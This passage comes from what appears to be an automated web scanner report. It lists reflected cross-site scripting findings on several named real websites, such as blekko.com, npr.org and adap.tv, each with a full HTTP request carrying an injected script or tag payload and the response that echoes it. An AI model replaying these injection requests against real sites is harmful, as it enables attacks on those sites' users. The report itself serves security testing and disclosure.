Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; domainseo-tab=domaincont-2; t=1299508790128; suggestedSlashtagsList=1; sessionid=45305018; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Mar 2011 12:03:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Fri, 05 Mar 2021 12:03:06 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 84069
X-Blekko-QF: Qchq
X-Blekko-PT: 042a38d99a6f8db8ffe718e97a91e511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /visualizeb1276--><script>alert(1)</script>2f27a7397c8 slash_q: /visualizeb1276-->
...[SNIP]...

1.86. http://blekko.com/ws/http:%2F%2Fcloudscan.me+/seo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Fcloudscan.me+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5c199--><script>alert(1)</script>8d3c8e8979c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Fcloudscan.me+/seo5c199--><script>alert(1)</script>8d3c8e8979c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; v=3; fbl=2; t=1299508790128

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:48:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:48:11 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: hq
X-Blekko-PT: ca8f9822629385a52eae4bf3cde4049b
Content-Length: 24187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seo5c199--><script>alert(1)</script>8d3c8e8979c slash_q: /seo5c199-->
...[SNIP]...

1.87. http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Fcloudscan.us+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b6468--><script>alert(1)</script>b2125480183 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Fcloudscan.us+/seob6468--><script>alert(1)</script>b2125480183 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Fxss.cx+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=3; t=1299508779576

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:47:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:47:53 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: eq
X-Blekko-PT: bda64d9e1964cd70b7369413091663d5
Content-Length: 22003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seob6468--><script>alert(1)</script>b2125480183 slash_q: /seob6468-->
...[SNIP]...

1.88. http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Felbo.ws%2F+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload cc0e5--><script>alert(1)</script>557c4487d5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Felbo.ws%2F+/seocc0e5--><script>alert(1)</script>557c4487d5b HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http://elbo.ws/+/visualize8d039--%3E%3Cscript%3Ealert(1)%3C/script%3E23bc12b73c2?&co=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; fbl=2; v=1; suggestedSlashtagsList=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:47:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:47:22 GMT
Set-Cookie: v=2; path=/; expires=Thu, 04 Mar 2021 14:47:22 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: hq
X-Blekko-PT: e26c82e37d939e4ef51df6f7252117ea
Content-Length: 25458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seocc0e5--><script>alert(1)</script>557c4487d5b slash_q: /seocc0e5-->
...[SNIP]...

1.89. http://blekko.com/ws/http:%2F%2Fxss.cx+/seo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http:%2F%2Fxss.cx+/seo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2d119--><script>alert(1)</script>cd9b01d6718 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http:%2F%2Fxss.cx+/seo2d119--><script>alert(1)</script>cd9b01d6718 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2; t=1299508761762

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 14:47:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 14:47:38 GMT
Set-Cookie: v=3; path=/; expires=Thu, 04 Mar 2021 14:47:38 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
X-Blekko-QF: eq
X-Blekko-PT: c16cbd89bf92d14609e743ac230fd185
Content-Length: 21937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /seo2d119--><script>alert(1)</script>cd9b01d6718 slash_q: /seo2d119-->
...[SNIP]...

1.90. http://blekko.com/ws/http://elbo.ws/+/duptext [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/duptext

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 621ab--><script>alert(1)</script>e87cefc468f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/duptext621ab--><script>alert(1)</script>e87cefc468f?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633; fbl=2; v=2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:40:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:40:54 GMT
Set-Cookie: v=3; path=/; expires=Thu, 04 Mar 2021 01:40:54 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26245
X-Blekko-QF: hq
X-Blekko-PT: 48b9f1946161c79ec1a3cf666dd632e7

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /duptext621ab--><script>alert(1)</script>e87cefc468f slash_q: /duptext621ab-->
...[SNIP]...

1.91. http://blekko.com/ws/http://elbo.ws/+/sections [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/sections

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload a97a6--><script>alert(1)</script>222caa3f0a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/sectionsa97a6--><script>alert(1)</script>222caa3f0a5?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633; fbl=2; v=3
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:47:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:47:20 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26259
X-Blekko-QF: hq
X-Blekko-PT: 4517bc59248ab52a9aac62710e4fec74

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /sectionsa97a6--><script>alert(1)</script>222caa3f0a5 slash_q: /sectionsa97a6-->
...[SNIP]...

1.92. http://blekko.com/ws/http://elbo.ws/+/urlseo [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/urlseo

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload d4048--><script>alert(1)</script>a9a3a3e2e54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/urlseod4048--><script>alert(1)</script>a9a3a3e2e54?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633; fbl=2; v=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:43:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:43:46 GMT
Set-Cookie: v=2; path=/; expires=Thu, 04 Mar 2021 01:43:46 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26231
X-Blekko-QF: hq
X-Blekko-PT: bc0ea90210c45929edf8143450faf9b4

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /urlseod4048--><script>alert(1)</script>a9a3a3e2e54 slash_q: /urlseod4048-->
...[SNIP]...

1.93. http://blekko.com/ws/http://elbo.ws/+/visualize [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/visualize

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 8d039--><script>alert(1)</script>23bc12b73c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/visualize8d039--><script>alert(1)</script>23bc12b73c2?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:39:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:39:42 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:39:42 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26273
X-Blekko-QF: hq
X-Blekko-PT: 73fb5a5406d974af4c58137f212bb6d8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /visualize8d039--><script>alert(1)</script>23bc12b73c2 slash_q: /visualize8d039-->
...[SNIP]...

1.94. http://community.bomgar.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.bomgar.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46c59<script>alert(1)</script>14300c00191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /46c59<script>alert(1)</script>14300c00191 HTTP/1.1
Host: community.bomgar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Mar 2011 12:03:23 GMT
Server: Apache
Set-Cookie: swl_bomgar_sess=8a53d406464e7e265306bdfd14ce9b18; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: swl_debug=deleted; expires=Mon, 08-Mar-2010 12:03:23 GMT; httponly
Vary: Accept-Encoding
Content-Length: 239
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /46c59<script>alert(1)</script>14300c00191 was not found on this server.</p>
...[SNIP]...

1.95. http://community.npr.org/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.npr.org
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 853e1<script>alert(1)</script>8247c141a2c was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Commented%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%2C%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Recommended%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c HTTP/1.1
Host: community.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plckarptnpr=R4181523433; GUID=00072D2E61F00D7544B182A361626364; LE1=j7MTD1+4mf4+31+5; LE2=j7MTD1+4Gc4+31+5; __gads=ID=fcdec54320c1d3ec:T=1299538425:S=ALNI_MZC3MrMfYZgHu4zHMiEHfmLb2rLJQ

Response

HTTP/1.1 200 OK
Set-Cookie: plckarptnpr=R4181523433; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Pluckbox: l3vm107
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm107l3pluckcom
Set-Cookie: SiteLifeHost=l3vm107l3pluckcom; domain=npr.org; path=/
Set-Cookie: anonId=151fcba0-525e-4a17-b991-b4e77e5a474c; domain=npr.org; expires=Tue, 06-Mar-2012 22:54:45 GMT; path=/
Date: Mon, 07 Mar 2011 22:54:44 GMT
Content-Length: 8115

RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"03/07/2011 05:54:45:444 PM"}],"Responses":[{"DiscoverContentAction":{"SearchSections":[{"Name":"all"}],"SearchCategories":[{"Name":"all"}],
...[SNIP]...

1.96. http://control.adap.tv/control [as parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 98ac4<a>9babd9333ae was submitted in the as parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=398ac4<a>9babd9333ae&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A06%3A32";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:53:12 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29120

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
riam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=398ac4<a>9babd9333ae&eov=fw5il5]]>
...[SNIP]...

1.97. http://control.adap.tv/control [categories parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the categories request parameter is copied into the HTML document as plain text between tags. The payload 2afc5<a>336ae514bdb was submitted in the categories parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory22afc5<a>336ae514bdb&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A04%3A35";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:51:15 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
0&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory22afc5<a>336ae514bdb&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.98. http://control.adap.tv/control [companionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the companionId request parameter is copied into the HTML document as plain text between tags. The payload bfcf8<a>990b97b465b was submitted in the companionId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_adbfcf8<a>990b97b465b&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A05%3A56";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:52:36 GMT
Content-Type: text/xml
